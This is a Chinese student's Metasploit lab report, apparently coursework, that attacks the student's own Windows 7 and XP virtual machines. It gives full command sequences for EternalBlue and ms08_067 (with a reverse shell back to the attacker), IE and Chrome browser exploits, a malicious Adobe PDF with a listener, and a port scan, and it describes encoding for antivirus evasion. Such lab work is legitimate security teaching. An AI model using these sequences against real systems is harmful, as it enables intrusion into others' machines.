首页 > 其他分享 > Exp6 MSF应用基础

Exp6 MSF应用基础

时间:2023-05-04 23:45:55浏览次数:41  
标签:set windows Exp6 192.168 漏洞 exploit 应用 MSF 靶机

一、基础问题回答

1.用自己的话解释什么是exploit,payload,encode.

答:
exploit:进行渗透攻击的模块合集,相当于一个载具
payload:相当于shellcode,攻击载荷,是一串具有攻击性的代码
encode:对所需传输文件进行编码,从而可以达到免杀目的

二、实验目的

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.一个主动攻击实践,尽量使用最新的类似漏洞;
2.一个针对浏览器的攻击,尽量使用最新的类似漏洞;
3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
4.成功应用任何一个辅助模块。

三、实验过程记录

0.准备工作

(1)下载靶机
win7迅雷下载链接:ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/
windows XP迅雷下载链接:ed2k://|file|en_windows_xp_home_with_service_pack_3_x86_cd_x1492413.iso|592154624|E31A555C0AB581B8610583D2D25E93BD|/

(2)关闭靶机防火墙

(3)打开445端口

(4)查看靶机IP地址

win7:192.168.113.133
window XP:192.168.113.134

1.一个主动攻击实践,尽量使用最新的类似漏洞;

msfconsole
search scanner/smb/smb_
use 7
show options
set rhosts 192.168.113.133
run

查找对应利用漏洞模块
search exploit/windows/smb/

第19条攻击方式:ms17-010(win7)

查看靶机该漏洞:nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.113.133
选择对应MSF板块,设置靶机ip地址,执行攻击:
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.113.133
exploit

测试攻击:ipconfig

第15条攻击方式:ms08_067(XP系统)

msfconsole
search ms08_067//查找该漏洞使用的攻击模块
use exploit/windows/smb/ms08_067_netapi//进入攻击模块
show payloads
set payload generic/shell_reverse_tcp //设置payload为反向tcp连接
set RHOST 192.168.113.134//设置靶机IP (winxp ip)
set LPORT 1203 //设置攻击机端口
set LHOST 192.168.113.130//设置攻击机IP (kali ip)
exploit

2.一个针对浏览器的攻击,尽量使用最新的类似漏洞;

**查找对应利用漏洞模块 **
search exploit/windows/smb/

第117条攻击方式:ms10_018_ie_behaviors(win7)

use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/bind_tcp
set RHOSTS 192.168.113.133
set target 0
exploit

使用win7的IE浏览器访问

输入其他网址可以正常打开

第50条攻击方式:chrome_filereader_uaf(win7)

use exploit/windows/browser/chrome_filereader_uaf
set payload windows/meterpreter/reverse_tcp
set URIPATH /
set LHOST 192.168.113.130
exploit

靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入该地址,发现无法打开。

3.一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

msfconsole //进入控制台
search adobe //进行查找
use windows/fileformat/adobe_cooltype_sing //使用漏洞
info //查看漏洞具体信息
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 1203//设置端口号
set RHOST 192.168.113.130//设置靶机IP地址
exploit #攻击

将生成的msf文件复制到桌面上cp -r "/root/.msf4/local/msf.pdf" "/home/kali/Desktop/"

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 192.168.113.134 //设置靶机IP地址
set LPORT 1203 //设置端口号
exploit //攻击

回连失败。

4.成功应用任何一个辅助模块。

使用PortScan进行端口扫描

use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.113.133
exploit

四、实践总结与体会

经过本次试验,我对Metasploit有了更深的理解,Metasploit完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本一样。它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。在进行本次实验的时候,出现了复制到window XP的pdf文件无法回连到kali虚拟机。而且对PDF回连的实现过程不是很明确。仍在查询资料解决问题。

五、离实战还缺些什么技术或步骤?

答:渗透攻击受系统、软件版本的限制比较大,而且需要关闭防火墙。这就比较难以实现。而且如何使被攻击者点击我们设定的网址和文件也是不可控的。而且许多的漏洞已经被修复。慢慢的,可利用的漏洞发现的难度越来越大。

标签:set,windows,Exp6,192.168,漏洞,exploit,应用,MSF,靶机
From: https://www.cnblogs.com/1314liyang/p/17372893.html

相关文章

  • 5月4日:unordermap/set,哈希以及哈希常用的拉链法,开放地址法,以及模板的特化相关应用
    起处较为流行的数据储存方式为树形结构,再加上红黑树等优秀数据结构的发展,直到今天二叉平衡搜索树也经常被应用在各种方面,但是c++库里面还有两个与map/set很像的容器unorderedmap,他们的调用与普通的map几乎一样,有着非常优秀的查找时间复杂度,只是不能像二叉树哪样层序遍历得到顺序的......
  • MSF应用基础
    目录课程:网络对抗技术班级:2012姓名:郭幸坤学号:20201213实验名称:MSF应用基础实验日期:2023.5.3实验目的实验内容实验过程(一)主动攻击实践1-win7漏洞-永恒之蓝1-1-扫描win7的smb服务1-2-使用永恒之蓝漏洞攻击(二)针对浏览器的攻击1-msf自动化攻击1.1-受害者浏览器访问网址2-......
  • Exp6 MSF应用基础
    Exp6MSF应用基础目录Exp6MSF应用基础0.基础问题回答1.实验过程记录1.0准备工作1.1一个主动攻击实践,尽量使用最新的类似漏洞;利用ms08_067漏洞攻击WindowsXP1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;利用ms06_013_createtextrange漏洞攻击WindowsXPSP3的IE浏览器利用......
  • MSF应用基础
    MSF应用基础基础问题回答用自己的话解释什么是exploit,payload,encode.exploit语义上来讲是利用计算机系统或者软件漏洞的行为方式,目的为实现非法或未授权的访问行为。在Metasploit框架中,exploit是指利用程序中的漏洞来攻击目标系统的代码,Metasploit框架提供了许多现成的e......
  • Exp6 MSF应用基础
    目录一、实践内容二、实践过程(一)创建靶机(二)一个主动攻击实践1.利用ms08_067漏洞攻击WindowsXP2.利用ms17_010_eternalblue漏洞攻击Windows(三)一个针对浏览器的攻击1.利用ms06_013_createtextrange漏洞攻击WindowsXPSP3的IE浏览器(1)设计攻击模块及参数(四)一个针对客户端的攻击1.Ad......
  • 网络对抗实验六 MSF应用基础--20201313
    《网络对抗技术》——Exp6MSF应用基础目录《网络对抗技术》——Exp6MSF应用基础一、实践内容二、问题回答三、实践过程实验准备:1、一个主动攻击实践ms08_067_netapi2、一个针对浏览器的攻击ms10_018_ie_behaviors3、一个针对客户端的攻击Wireshark4、成功应用一个辅助模块sniff......
  • Exp6 MSF应用基础
    目录一.实验信息二.实验内容三.实验知识四.实验过程4.1一个主动攻击实践(ms17_010)4.2一个针对浏览器的攻击(ms10_018)4.3一个针对客户端的攻击4.4成功应用任何一个辅助模块(scannerport)五.基础问题回答六.实验总结体会一.实验信息课程名称:网络对抗技术实验序号:6实验名称:MSF......
  • 《网络对抗技术》——Exp6 MSF应用基础
    目录一、实践内容二、实践原理三、实践过程1、一个主动攻击实践4.2针对浏览器的攻击3、一个针对客户端的攻击4、成功应用一个辅助模块四、实践问题回答五、离实践还缺什么技术或步骤六、实践心得体会一、实践内容本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻......
  • 网络对抗实验六 MSF应用基础
    Exp6MSF应用基础实验目标1.1一个主动攻击实践,尽量使用最新的类似漏洞;(1分)1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)1.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)1.4成功应用任何一个辅助模块。(1分)实验内容0实验准备0.1实验原理0.1.......
  • 20201306 Exp6 MSF应用基础
    一、实践内容二、实践原理三、实践过程1、一个主动攻击实践ms08_067_netapims17_0102、一个针对浏览器的攻击ms14_064ms17-0103、一个针对客户端的攻击AdobeWireshark4、成功应用一个辅助模块sniffer嗅探portscan端口扫描MSF使用nmap四、实践问题回答五、离实践......